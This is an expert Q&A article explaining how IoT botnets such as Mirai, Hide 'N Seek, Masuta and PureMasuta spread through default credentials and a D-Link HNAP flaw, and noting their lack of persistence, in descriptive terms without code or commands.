Another round of botnets have been plaguing IoT devices, including the Hide 'N Seek, Masuta and PureMasuta. How are these IoT botnets different than previous cases, and how are they spreading?
The threat landscape of the internet changed for the worse in 2016 when the source code for the Mirai malware was leaked. The code exploits factory default or hard-coded usernames and passwords to gain access to devices, such as routers, wireless cameras and digital video recorders. While those behind the Mirai malware have been charged, the availability of the Mirai source code resulted in other hackers using it to create IoT botnets. These powerful zombie networks have been used to launch distributed denial-of-service (DDoS) attacks of an unprecedented size -- its creators used a botnet of around 300,000 compromised IoT devices to flood victims with DDoS traffic. Likewise, on Sept. 20, 2016, the Krebs on Security website was hit with 620 Gbps worth of Mirai-spawned IoT-based traffic. Recent discoveries show that hackers are developing new ways to better grow and control IoT botnets.
For example, security researchers at Bitdefender discovered the Hide 'N Seek (HNS) botnet pwning Korean-manufactured IP cameras around the world. By using a randomly generated and updatable list of IP addresses, the botnet attempts to log in to any device that returns a "buildroot login" banner by using a set of predefined credentials or even a dictionary attack. Once logged in, the bot selects the most suitable compromise method based on the type of device and communicates over a custom-built decentralized peer-to-peer network. To prevent infiltration or poisoning attempts, the file that is used to authenticate the command -- and also update the memory zone where configuration settings are stored -- is signed with an elliptic curve key. On top of these antitampering techniques, the bot has data exfiltration and code execution capabilities.
While HNS is similar to the decentralized peer-to-peer architecture of the Hajime IoT botnet, the Masuta and PureMasuta variants -- next-generation versions of Mirai discovered by researchers at NewSky Security -- are possibly designed by the Satori botnet creators. The variants use known or default credentials that are weak to access IoT devices in the same way as Mirai; however, PureMasuta also exploits buffer overflow vulnerabilities in the web administration interface of D-Link's Home Network Administration Protocol, which is used to manage the device's configuration. While any flaw in a popular protocol increases the potential number and scope of devices that can be pwned, this enables the attacker to pass a request that bypasses authentication, which then runs a shell script downloaded from a command and control server.
Like other IoT botnets, these bots cannot achieve persistence and a reboot of a compromised device returns it back to a clean state; however, they are under the control of the attacker until then. Although the new WPA3 helps protect devices that don't have a strong password by preventing brute force and dictionary password attacks, any device that uses the factory default password will still be vulnerable.
Ask the expert:
Want to ask Michael Cobb a question about application security? Submit your questions now via email. (All questions are anonymous.)